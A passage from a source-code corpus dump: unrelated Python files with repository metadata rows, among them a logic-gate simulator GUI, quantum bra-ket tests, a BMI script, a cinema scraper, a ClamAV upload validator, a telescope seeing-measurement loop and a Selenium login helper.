This is a way to allow users to ignore the underlying module
"""
self._top.AddOrGate(pos, out, a, b, c, d)
def AddNorGate(self, pos, out, a, b, c = None, d = None):
""" Create an NOR gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddNorGate(pos, out, a, b, c, d)
def AddNotGate(self, pos, out, a):
""" Create a NOT gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddNotGate(pos, out, a)
def AddXorGate(self, pos, out, a, b, c = None, d = None):
""" Create an XOR gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddXorGate(pos, out, a, b, c, d)
def AddNxorGate(self, pos, out, a, b, c = None, d = None):
""" Create an NXOR gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddNxorGate(pos, out, a, b, c, d)
def AddMux21(self, pos, out, select, a, b):
""" Create a 2-1 MUX
This is a way to allow users to ignore the underlying module
"""
self._top.AddMux21(pos, out, select, a, b)
def AddMux41(self, pos, out, c0, c1, d0, d1, d2, d3):
""" Create a 4-1 MUX
This is a way to allow users to ignore the underlying module
"""
self._top.AddMux41(pos, out, c0, c1, d0, d1, d2, d3)
def AddTff(self, pos, q, t, clk, rst = None, s = None):
""" Create a T Flip-Flop
This is a way to allow users to ignore the underlying module
"""
        self._top.AddTff(pos, q, t, clk, rst, s)
def AddDff(self, pos, q, d, clk, rst = None, s = None):
""" Create a D Flip-Flop
This is a way to allow users to ignore the underlying module
"""
        self._top.AddDff(pos, q, d, clk, rst, s)
# TODO Add Counter and Add Decoder
def AddModule(self, module, pos, name):
""" Add a module
This is a way to allow users to ignore the underlying module
"""
self._top.AddModule(module, pos, name)
# map it for lookup by shape object
self._moduleMap[module.GetShape()] = module
def Start(self):
""" Initialize and start the simulator """
# we have deferred adding anything to the canvas until now
self._top.Render()
self._canvas.ConnectAllWires()
# this will build a list of lists, from highest to lowest level
# of modules so we can show/hide them all
self._moduleHierarchy.append([]) # empty top node
self._buildHierarchy(self._top, 1)
self._displayDepth = len(self._moduleHierarchy) - 1
# we need a trick to run the simulator and the main loop...
def EventLoop():
@instance
def inst():
while(self._frame and not self._frame.IsExit()):
yield delay(1)
self._frame.GetStatusBar().SetFields(["Simulation step: " + str(now())])
self._refresh()
self._app.MainLoop()
else:
self._timer.stop()
raise StopSimulation
return inst
event_loop_runner = EventLoop()
# grab top module
self._instances.append(self._top.GetInstances())
self._instances.append(event_loop_runner)
self._simulator = Simulation(*self._instances)
self._simulator.run()
def _buildHierarchy(self, module, level):
""" Recursive calls to build the module hierarchy list
This is used for module showing/hiding by depth
"""
for m in module.GetModules():
if level + 1 > len(self._moduleHierarchy):
self._moduleHierarchy.append([])
self._moduleHierarchy[level].append(m)
self._buildHierarchy(m, level + 1)
def OnTimer(self, e):
""" Handle timing simulation
"""
if not self._pause:
self._app.ExitMainLoop()
def OnKey(self, e):
""" Switch toggling by keypress
Also handles "zooming" level of detail to display
"""
key = e.GetKeyCode()
map = self._signalMap
if (key in map):
map[key].Toggle()
self._app.ExitMainLoop()
elif key in [wx.WXK_PRIOR, wx.WXK_PAGEUP]:
tempDepth = max([self._displayDepth - 1, 0])
if (tempDepth != self._displayDepth):
for m in self._moduleHierarchy[self._displayDepth]:
m.ShowDetails(False)
self._displayDepth = tempDepth
self._refresh()
elif key in [wx.WXK_NEXT, wx.WXK_PAGEDOWN]:
tempDepth = min([self._displayDepth + 1, len(self._moduleHierarchy) - 1])
if (tempDepth != self._displayDepth):
for m in self._moduleHierarchy[tempDepth]:
m.ShowDetails(True)
self._displayDepth = tempDepth
self._refresh()
def GetFrame(self):
""" Get the frame for event firing
"""
return self._frame
def _refresh(self):
""" Refresh the canvas after updating signal shapes
"""
for s in self._signals:
s.Update()
self._top.Update()
self._canvas.Refresh(False)
def Init():
app = wx.App(False)
manager = Manager(app)
ogl.OGLInitialize()
return manager
| 33.353952 | 92 | 0.571914 | 1,209 | 9,706 | 4.498759 | 0.234905 | 0.023166 | 0.018018 | 0.01765 | 0.329472 | 0.305939 | 0.305939 | 0.289024 | 0.267696 | 0.242692 | 0 | 0.007995 | 0.329899 | 9,706 | 290 | 93 | 33.468966 | 0.82826 | 0.268082 | 0 | 0.132867 | 0 | 0 | 0.003212 | 0 | 0 | 0 | 0 | 0.013793 | 0 | 1 | 0.188811 | false | 0 | 0.041958 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
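`Manager._buildHierarchy` above flattens nested modules into per-depth lists so that a whole level of detail can be shown or hidden at once (PageUp/PageDown in `OnKey`). The same recursion on a plain nested structure, with hypothetical `children` dicts standing in for `Module.GetModules()`:

```python
def build_hierarchy(node, level, levels):
    """Append each descendant's name to the list for its depth."""
    for child in node["children"]:
        if level + 1 > len(levels):
            levels.append([])
        levels[level].append(child["name"])
        build_hierarchy(child, level + 1, levels)
    return levels

tree = {"name": "top", "children": [
    {"name": "alu", "children": [{"name": "adder", "children": []}]},
    {"name": "regfile", "children": []},
]}
print(build_hierarchy(tree, 1, [[]]))  # → [[], ['alu', 'regfile'], ['adder']]
```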
ca713885917f88c7111540d8832e21eb26208818 | 1,438 | py | Python | tests/src/dirac_notation/test_bra.py | KaroliShp/Quantumformatics | 4166448706c06a1a45abd106da8152b4f4c40a25 | [
"MIT"
] | 2 | 2019-10-28T20:26:14.000Z | 2019-10-29T08:28:45.000Z | tests/src/dirac_notation/test_bra.py | KaroliShp/Quantumformatics | 4166448706c06a1a45abd106da8152b4f4c40a25 | [
"MIT"
] | 3 | 2019-10-28T09:19:27.000Z | 2019-10-28T13:42:08.000Z | tests/src/dirac_notation/test_bra.py | KaroliShp/Quantumformatics | 4166448706c06a1a45abd106da8152b4f4c40a25 | [
"MIT"
] | null | null | null | import pytest
from pytest_mock import mocker
from hamcrest import *
import numpy as np
from src.dirac_notation.ket import Ket
from src.dirac_notation.bra import Bra
from src.dirac_notation.matrix import Matrix
@pytest.mark.parametrize('input_1,input_2,expected_output_1,expected_output_2', [
(
Bra([1,1]),
[
Bra([1,0]), Bra([0,1])
],
True,
[
1, 1
]
), (
Bra([1,1]),
[
Bra([1,0]), Bra([2,0])
],
False, 0
)
])
def test_linear_combination(input_1, input_2, expected_output_1, expected_output_2):
output = input_1.linear_combination(input_2)
assert_that(output[0], equal_to(expected_output_1))
np.testing.assert_array_equal(output[1], expected_output_2)
# Magic methods
@pytest.mark.parametrize('input_1,input_2,expected_output', [
(
Bra([1, 0]), Ket([1, 0]), 1
), (
Bra([0, 1]), Ket([1, 0]), 0
),(
Bra([1, 0]), Matrix([[1, 0],[0, 1]]), Bra([1, 0])
)
])
def test_mul(input_1, input_2, expected_output):
output = input_1 * input_2
assert_that(output, equal_to(expected_output))
@pytest.mark.parametrize('input_1,input_2,expected_output', [
(
Ket([1,0]), Bra([0, 1]), Matrix([[0, 1],[0, 0]])
)
])
def test_rmul(input_1, input_2, expected_output):
output = input_1 * input_2
assert_that(output, equal_to(expected_output)) | 24.372881 | 84 | 0.604312 | 209 | 1,438 | 3.904306 | 0.186603 | 0.205882 | 0.107843 | 0.117647 | 0.539216 | 0.474265 | 0.474265 | 0.442402 | 0.442402 | 0.301471 | 0 | 0.061355 | 0.240612 | 1,438 | 59 | 85 | 24.372881 | 0.685897 | 0.00904 | 0 | 0.326531 | 0 | 0 | 0.079354 | 0.079354 | 0 | 0 | 0 | 0 | 0.081633 | 1 | 0.061224 | false | 0 | 0.142857 | 0 | 0.204082 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca7a85095b1b2b5b29546e3e20953394398b0936 | 297 | py | Python | bmi.py | manmik2323/lifeisawesome.online | 286b6a252c58d4751f07c28a343343a8fbb862fc | [
"CC-BY-3.0"
] | null | null | null | bmi.py | manmik2323/lifeisawesome.online | 286b6a252c58d4751f07c28a343343a8fbb862fc | [
"CC-BY-3.0"
] | null | null | null | bmi.py | manmik2323/lifeisawesome.online | 286b6a252c58d4751f07c28a343343a8fbb862fc | [
"CC-BY-3.0"
] | null | null | null | import cgitb
cgitb.enable()
print("This is a simple BMI convertor")
weight = float(input("Enter weight in pounds: "))
height = float(input("Enter height in inches: "))
weight_kg = weight / 2.205 # pounds to kg
height_m = height / 39.37
BMI = weight_kg / (height_m ** 2)
print(f'BMI is {BMI:.2f}')
| 29.7 | 49 | 0.693603 | 50 | 297 | 4.04 | 0.54 | 0.09901 | 0.148515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 0.158249 | 297 | 9 | 50 | 33 | 0.768 | 0.040404 | 0 | 0 | 0 | 0 | 0.332155 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
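The arithmetic in `bmi.py` can be factored into a pure function, which makes it testable without stdin; the conversion constants (2.205 lb per kg, 39.37 in per m) are the same ones used above:

```python
def bmi(weight_lb, height_in):
    """Body-mass index (kg/m^2) from imperial units."""
    weight_kg = weight_lb / 2.205
    height_m = height_in / 39.37
    return weight_kg / height_m ** 2

print(f"BMI is {bmi(150, 68):.2f}")  # → BMI is 22.80
```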
ca891eab678acc220da14e7299f6f382535e0a94 | 1,910 | py | Python | BI-IOS/semester-project/webapp/beecon/campaigns/libs/cinemas/mvMovieSchedules.py | josefdolezal/fit-cvut | 6b6abea4232b946246d33290718d6c5007926b63 | [
"MIT"
] | 20 | 2016-05-15T10:39:53.000Z | 2022-03-29T00:06:06.000Z | BI-IOS/semester-project/webapp/beecon/campaigns/libs/cinemas/mvMovieSchedules.py | josefdolezal/fit-cvut | 6b6abea4232b946246d33290718d6c5007926b63 | [
"MIT"
] | 3 | 2017-05-27T16:44:01.000Z | 2019-01-02T21:02:59.000Z | BI-IOS/semester-project/webapp/beecon/campaigns/libs/cinemas/mvMovieSchedules.py | josefdolezal/fit-cvut | 6b6abea4232b946246d33290718d6c5007926b63 | [
"MIT"
] | 11 | 2018-08-22T21:16:32.000Z | 2021-04-10T22:42:34.000Z | # -*- coding: utf-8 -*-
from DataSource import CinemaCity
from bs4 import BeautifulSoup
from datetime import datetime
import re
class MovieSchedule:
def __init__( self, url, date ):
self.url = url
self._load_schedule()
def closest_movies( self ):
print( self.movies )
def _load_schedule( self ):
        cc = CinemaCity( self.url )
self._parse_schedule( cc.movie_schedule() )
def _parse_schedule( self, html ):
soup = BeautifulSoup( html, 'html.parser' )
movies = soup.find_all( 'tr' )
self.movies = [ Movie( movie ) for movie in movies if movie.td ]
class Movie:
    def __init__(self, soup):
        self._remove_empty_elements(soup)
        self._parse_input(soup)

    def __str__(self):
        return self.to_json()

    def __repr__(self):
        return self.to_json()

    def to_json(self):
        js = '{'
        js += '"name":"{}", "pg":"{}", "type":"{}", '.format(
            self.name, self.pg, self.mtype)
        js += '"language":"{}", "duration":"{}", '.format(
            self.language, self.duration)
        js += '"showtimes":{}'.format(self._showtimes_to_json())
        js += '}'
        return js

    def _parse_input(self, soup):
        # Each extract() removes the first remaining <td>, so the
        # columns are consumed left to right.
        self.name = soup.td.extract().a.string
        self.pg = soup.td.extract().string
        self.mtype = soup.td.extract().string
        self.language = soup.td.extract().string
        self.duration = soup.td.extract().string
        self._setup_showtimes(soup)

    def _remove_empty_elements(self, soup):
        for el in soup.find_all('td'):
            if not el.contents:
                el.extract()

    def _setup_showtimes(self, soup):
        self.showtimes = [datetime.strptime(e.a.string.strip(), '%H:%M').time()
                          for e in soup.find_all('td')]

    def _showtimes_to_json(self):
        return '[' + ', '.join(
            '"{}"'.format(show.strftime('%H:%M')) for show in self.showtimes
        ) + ']'
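Hand-building JSON with string concatenation, as `to_json()` does above, breaks as soon as a field contains a quote. A minimal alternative sketch using the stdlib `json` module, which handles escaping automatically (the helper name below is my own, not part of the scraper):

```python
import json
from datetime import time


def movie_to_json(name, pg, mtype, language, duration, showtimes):
    # showtimes: a list of datetime.time objects, as produced by _setup_showtimes.
    return json.dumps({
        'name': name,
        'pg': pg,
        'type': mtype,
        'language': language,
        'duration': duration,
        'showtimes': [t.strftime('%H:%M') for t in showtimes],
    })
```

The output is valid JSON regardless of the characters in the movie title.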
| 25.466667 | 111 | 0.611518 | 250 | 1,910 | 4.464 | 0.284 | 0.026882 | 0.058244 | 0.0681 | 0.150538 | 0.041219 | 0 | 0 | 0 | 0 | 0 | 0.002037 | 0.228796 | 1,910 | 74 | 112 | 25.810811 | 0.755601 | 0.010995 | 0 | 0.072727 | 0 | 0 | 0.064653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.218182 | false | 0 | 0.072727 | 0.036364 | 0.4 | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca8c2762f3fbfac9e880ce9182c81186e49f9ea1 | 2,305 | py | Python | django_fileuploadvalidation/modules/validation/validator.py | IV1T3/django-middleware-fileuploadvalidation | 7396702415a623424e3e790edc2f5dd51041d908 | [
"Apache-2.0"
] | null | null | null | django_fileuploadvalidation/modules/validation/validator.py | IV1T3/django-middleware-fileuploadvalidation | 7396702415a623424e3e790edc2f5dd51041d908 | [
"Apache-2.0"
] | 34 | 2021-07-22T14:43:20.000Z | 2022-03-14T08:40:49.000Z | django_fileuploadvalidation/modules/validation/validator.py | IV1T3/django-middleware-fileuploadvalidation | 7396702415a623424e3e790edc2f5dd51041d908 | [
"Apache-2.0"
] | null | null | null | import clamd
import logging
from io import BytesIO
from . import basic, image, quicksand
def get_clamAV_results(file_object):
    # Connects to the ClamAV UNIX socket on /var/run/clamav/clamd.ctl
    clam_daemon = clamd.ClamdUnixSocket()
    clamd_res = clam_daemon.instream(BytesIO(file_object.content))
    return clamd_res["stream"][0]


def validate(files, upload_config):
    logging.debug("[Validation module] - Starting validation")

    block_upload = False

    for file_name, file in files.items():
        if not block_upload:
            if upload_config["clamav"]:
                clamav_res = get_clamAV_results(file)
                malicious = clamav_res == "FOUND"

                if malicious:
                    block_upload = True
                    file.block = True
                    file.append_block_reason("ClamAV_detection")
                    logging.warning(
                        f"{file.basic_information.name} [Validation module] - Blocking file: ClamAV detection"
                    )

            if not file.block:
                # Perform basic file validation
                file = basic.validate_file(file, upload_config)

            if not file.block:
                # Perform quicksand scan
                file = quicksand.validate_file(file, upload_config)

            # Get guessed file type
            file_type = file.detection_results.guessed_mime

            # Perform file type specific validation
            if file_type.startswith("application"):
                pass
            elif file_type.startswith("audio"):
                pass
            elif file_type.startswith("image"):
                file = image.validate_file(file)
            elif file_type.startswith("text"):
                pass
            # elif file_type.startswith("video"):
            #     file = video.validate_file(file)
            # else:
            #     file = image.validate_file(file)

            logging.debug(
                f"[Validation module] - Current block status: {file.block} => {file.block_reasons}"
            )

            if file.block:
                block_upload = True

    return files, block_upload
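The chain of `startswith` branches above can also be expressed as a table lookup, which keeps the MIME-prefix-to-validator mapping in one place. A small illustrative sketch (the function and table names are mine, not part of this module):

```python
def dispatch_by_mime(file_type, handlers, default=None):
    # Return the handler for the first MIME prefix that matches, else the default.
    for prefix, handler in handlers.items():
        if file_type.startswith(prefix):
            return handler
    return default
```

Adding a new file class then only means adding one dictionary entry instead of another `elif` branch.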
| 32.464789 | 110 | 0.536659 | 225 | 2,305 | 5.32 | 0.333333 | 0.053467 | 0.066834 | 0.073517 | 0.188805 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00071 | 0.38872 | 2,305 | 70 | 111 | 32.928571 | 0.848829 | 0.121475 | 0 | 0.166667 | 0 | 0 | 0.130025 | 0.014392 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.071429 | 0.095238 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ca93f06b436cc477a9fe3786cd6aa0d7c14c1cf3 | 1,861 | py | Python | 001146StepikPyBegin/Stepik001146PyBeginсh11p06st07TASK03_20210311_lists_methods.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 001146StepikPyBegin/Stepik001146PyBeginсh11p06st07TASK03_20210311_lists_methods.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 001146StepikPyBegin/Stepik001146PyBeginсh11p06st07TASK03_20210311_lists_methods.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | import string
def onlyletters(s):
    s1 = []
    for i in s:
        if i not in string.punctuation:  # check, character by character, against the punctuation set
            s1.append(i)
    s2 = ''.join(s1)  # join the characters back into a word
    return s2


words = (input().lower()).split()  # normalize the words while reading them in
words_opt = []  # build the cleaned-up word list
for item in words:
    words_opt.append(onlyletters(item))
count1 = words_opt.count('a') + words_opt.count('an') + words_opt.count('the')
print(f'Total number of articles: {count1}')

# my_02
words = (input().lower()).split()
count1 = words.count('a') + words.count('an') + words.count('the')
print(f'Total number of articles: {count1}')

# f01
print('Total number of articles:', sum([1 for i in input().split() if i.lower() in ('a', 'an', 'the')]))

# f2
print('Total number of articles:', len([i for i in input().split() if i.lower() in ('a', 'an', 'the')]))

# f3
print(f"Total number of articles: {len([i for i in input().split() if i.lower() in ['a', 'an', 'the']])}")

# f4
s = input().lower().split()
count = [s.count('a'), s.count('an'), s.count('the')]
count = sum(count)
print(f'Total number of articles: {count}')

# f5
ss = input().lower().split()
print('Total number of articles:', sum(ss.count(article) for article in ('a', 'an', 'the')))

# f6
s, cnt = input().lower().split(), 0
articles = ['a', 'an', 'the']
for word in s:
    if word in articles:
        cnt += 1
print("Total number of articles:", cnt)

# f7
l = input().lower()
count = 0
for i in l.split(' '):
    if i == 'a' or i == 'an' or i == 'the':
        count += 1
print('Total number of articles:', count)

# f8
from re import findall

txt = input().lower()
res = findall(r'\ba\b|\ban\b|\bthe\b', txt)
print(f"Total number of articles: {len(res)}")

# f9
ca968827ae8ca82e5994b430fbeebecd32c70e99 | 1,027 | py | Python | setup.py | schyczewski/electrum-sum-server | 3e78c225290e8b21dc59e14aac5df7c6d99e0d8c | [
"MIT"
] | null | null | null | setup.py | schyczewski/electrum-sum-server | 3e78c225290e8b21dc59e14aac5df7c6d99e0d8c | [
"MIT"
] | null | null | null | setup.py | schyczewski/electrum-sum-server | 3e78c225290e8b21dc59e14aac5df7c6d99e0d8c | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
    name="electrum-sum-server",
    version="1.0",
    scripts=['run_electrum_sum_server.py', 'electrum-sum-server'],
    install_requires=['plyvel', 'jsonrpclib', 'irc >= 11, <=14.0'],
    package_dir={
        'electrumsumserver': 'src'
    },
    py_modules=[
        'electrumsumserver.__init__',
        'electrumsumserver.utils',
        'electrumsumserver.storage',
        'electrumsumserver.deserialize',
        'electrumsumserver.networks',
        'electrumsumserver.blockchain_processor',
        'electrumsumserver.server_processor',
        'electrumsumserver.processor',
        'electrumsumserver.version',
        'electrumsumserver.ircthread',
        'electrumsumserver.stratum_tcp'
    ],
    description="Sumcoin Electrum Server",
    author="Thomas Voegtlin",
    author_email="thomasv@electrum.org",
    license="MIT Licence",
    url="https://github.com/pooler/electrum-sum-server/",
    long_description="""Server for the Electrum Lightweight Sumcoin Wallet"""
)
| 33.129032 | 77 | 0.668939 | 92 | 1,027 | 7.304348 | 0.619565 | 0.065476 | 0.10119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008495 | 0.197663 | 1,027 | 30 | 78 | 34.233333 | 0.807039 | 0 | 0 | 0 | 0 | 0 | 0.578384 | 0.326193 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.034483 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca99e20a87727779716fbe845133ce076ca3fec6 | 997 | py | Python | dimsim/tests/test_dimsim.py | NTHU-NLPLAB/DimSim | c851d76c228088ee84064c5bda2ca3ef9feb34dd | [
"Apache-2.0"
] | null | null | null | dimsim/tests/test_dimsim.py | NTHU-NLPLAB/DimSim | c851d76c228088ee84064c5bda2ca3ef9feb34dd | [
"Apache-2.0"
] | null | null | null | dimsim/tests/test_dimsim.py | NTHU-NLPLAB/DimSim | c851d76c228088ee84064c5bda2ca3ef9feb34dd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Dependencies
import pytest

# The module to test
from dimsim.core.model import get_distance, get_candidates


def test_distance_near():
    dist = get_distance(u'大侠', u'大虾')
    assert dist == 0.0002380952380952381


def test_distance_far():
    dist = get_distance(u'大侠', u'大人')
    assert dist == 25.001417183349876


def test_distance_pinyin():
    dist = get_distance(['da4', 'xia2'], ['da4', 'xia1'], pinyin=True)
    assert dist == 0.0002380952380952381


def test_invalid_input():
    pytest.raises(AssertionError, get_distance, u'大侠', u'大')


def test_get_candidates_simplified():
    candidates = get_candidates(u'大侠', mode='simplified', theta=1)
    for c in candidates:
        assert c in [u'打下', u'大虾', u'大侠']


def test_get_candidates_traditional():
    candidates = get_candidates(u'粉丝', mode='traditional', theta=1)
    for c in candidates:
        assert c in [u'門市', u'分時', u'焚屍', u'粉飾', u'粉絲']


if __name__ == '__main__':
    pytest.main([__file__])
| 23.186047 | 70 | 0.673019 | 143 | 997 | 4.454545 | 0.412587 | 0.065934 | 0.070644 | 0.065934 | 0.299843 | 0.276295 | 0.100471 | 0.100471 | 0.100471 | 0.100471 | 0 | 0.07824 | 0.179539 | 997 | 42 | 71 | 23.738095 | 0.700489 | 0.053159 | 0 | 0.173913 | 0 | 0 | 0.078723 | 0 | 0 | 0 | 0 | 0 | 0.26087 | 1 | 0.26087 | false | 0 | 0.086957 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca9c42a3546a2a31de0428c29562026775458eb1 | 3,812 | py | Python | run_measure_seeing.py | marissakotze/timDIMM | dde00a3bb6ca7c3d9b71e24f9363350a0e2a323f | [
"BSD-3-Clause"
] | 1 | 2021-06-06T15:26:36.000Z | 2021-06-06T15:26:36.000Z | run_measure_seeing.py | marissakotze/timDIMM | dde00a3bb6ca7c3d9b71e24f9363350a0e2a323f | [
"BSD-3-Clause"
] | null | null | null | run_measure_seeing.py | marissakotze/timDIMM | dde00a3bb6ca7c3d9b71e24f9363350a0e2a323f | [
"BSD-3-Clause"
] | 3 | 2015-07-29T15:16:35.000Z | 2017-12-01T13:02:36.000Z | #!/usr/bin/env python
import os, shutil
import datetime
import ox_wagon
import pick_star
from find_boxes import find_boxes
from guide_gto900 import guide_gto900
from pygto900 import GTO900, status
from spiral_search_gto900 import spiralsearch
import time
import sys
old_star = None
repeat = 1
niter = 15
spiral_log = '/home/massdimm/spiral.log'
while True:
    # kill any existing running camera programs
    os.system('pkill ave_frames')
    os.system('pkill measure_seeing')
    time.sleep(5)

    # make sure the ox wagon is open
    try:
        ox = ox_wagon.OxWagon()
        ox = ox.open()
    except Exception, e:
        print 'Could not give open command to Ox Wagon: %s' % e
        pass

    # display telescope status
    # os.system('./pygto900.py status')
    # time.sleep(30)

    # warn if the telescope is pointing too low
    with GTO900() as g:
        alt = g.alt()
        if alt <= 30.0:
            print '!!!WARNING: Telescope is at an altitude lower than 30 degrees !!!'
            print 'Seeing measurements will not start'
            print 'YOU MAY WANT TO CHECK THE TELESCOPE ALIGNMENT AND POINTING BEFORE STARTING MEASUREMENTS'
            g.park_mode()
            sys.exit()
        else:
            print 'Telescope position checked'

        # pick the star
        try:
            pick_star.pick_star(g)
        except Exception, e:
            print 'Could not pick new star because %s' % e
            print 'WARNING: YOU MAY WANT TO STOP MEASUREMENT AND START AGAIN'
            g.park_mode()
            exit()

        # check to see if the star is available
        os.system('./ave_frames 10 \!center.fits')
        nstars = find_boxes('center.fits')
        if nstars < 2:
            nfound, sx, sy = spiralsearch(g, niter=niter)
            sout = open(spiral_log, 'a')
            sout.write('%s %i %i %i\n' % (datetime.datetime.now(), sx, sy, nfound))
            sout.close()
            if nfound == -1:
                print 'Could not find stars in %i iterations' % niter
                g.park_mode()
            os.system('./ave_frames 10 \!center.fits')
            nstars = find_boxes('center.fits')

    # start turbina running
    try:
        current_star = open('current_object').read().strip()
    except:
        old_star = None

    if (old_star is None) or (old_star != current_star):
        # os.system('./run_turbina.py')
        old_star = current_star

    # display star and log information
    os.system('cat center.fits | xpaset timDIMM fits')
    os.system('./pygto900.py log >> gto900.log')

    # measure star -- changed this down to 1000 from 10000
    os.system("./measure_seeing 10000 `tail -1 gto900.log | cut -d ' ' -f 7` `cat exptime`")

    # adjust the guiding
    guide_gto900()

    # update the documents
    if os.path.isfile('seeing.out'):
        t = datetime.datetime.now()
        centroid_file = 'centroids_%s.dat' % t.strftime('%Y%m%d-%H%M%S')
        shutil.move('centroids.dat', 'data/%s' % centroid_file)
        os.chdir('data')
        os.system('../dimm_stats.py %s' % centroid_file)
        os.chdir('../')
        os.system('echo "image;text 25 5 # text={Seeing = `cat seeing.out`}" | xpaset timDIMM regions')
        os.system('echo "image;text 290 5 # text={R0 = `cat r0.out` cm}" | xpaset timDIMM regions')
        # this is needed for the ELS viewer
        os.system("date +'%Y-%m-%dT%H:%M:%S%z' >> seeing.out")
        os.system("mv seeing.out seeing.txt")
        # os.system("scp seeing.txt timdimm@timdimm:/Users/timdimm/Sites/")
    else:
        print "FAIL!"
        os.system('echo "image;text 125 5 # text={Unsuccessful Measurement}" | xpaset timDIMM regions')
        if os.path.isfile('centroids.dat'):
            os.remove('centroids.dat')
        if os.path.isfile('seeing.out'):
            os.remove('seeing.out')
| 30.99187 | 106 | 0.612802 | 526 | 3,812 | 4.36692 | 0.372624 | 0.055725 | 0.016979 | 0.018285 | 0.149325 | 0.104484 | 0.084458 | 0.084458 | 0.047018 | 0.047018 | 0 | 0.028255 | 0.266527 | 3,812 | 122 | 107 | 31.245902 | 0.793276 | 0.137198 | 0 | 0.243902 | 0 | 0.036585 | 0.346883 | 0.014364 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.02439 | 0.121951 | null | null | 0.134146 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0465d285875f7341d40eda1201940586861d778c | 3,325 | py | Python | checker.py | nautilusPrime/howdy_checker | e2dfc2962a54d93d62d1f7dcc1b4690bd1760c95 | [
"Unlicense"
] | null | null | null | checker.py | nautilusPrime/howdy_checker | e2dfc2962a54d93d62d1f7dcc1b4690bd1760c95 | [
"Unlicense"
] | null | null | null | checker.py | nautilusPrime/howdy_checker | e2dfc2962a54d93d62d1f7dcc1b4690bd1760c95 | [
"Unlicense"
] | null | null | null |
# coding: utf-8
# author: Ankur Roy Chowdhury
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
class HowdyChecker():
    def __init__(self, howdy_site=None, output_file=None, chrome_driver_path='/usr/local/bin/chromedriver'):
        self.HOWDY_SITE = howdy_site
        self.OUTPUT_FILE = output_file

        opt = webdriver.chrome.options.Options()
        opt.set_headless()
        self.driver = webdriver.Chrome(
            executable_path=chrome_driver_path, options=opt)
        self.driver.implicitly_wait(30)
        # driver.maximize_window()

    def login(self, uname=None, passwd=None):
        self.driver.get(self.HOWDY_SITE)

        login_button = self.driver.find_element_by_id("loginbtn")
        login_button.click()

        username_field = self.driver.find_element_by_id('username')
        username_field.send_keys(uname)
        username_field.submit()

        password_field = self.driver.find_element_by_id('password')
        password_field.send_keys(passwd)
        password_field.submit()

    def check_course(self, term=None, subject=None, course=None):
        self.TERM = term
        self.SUBJECT = subject
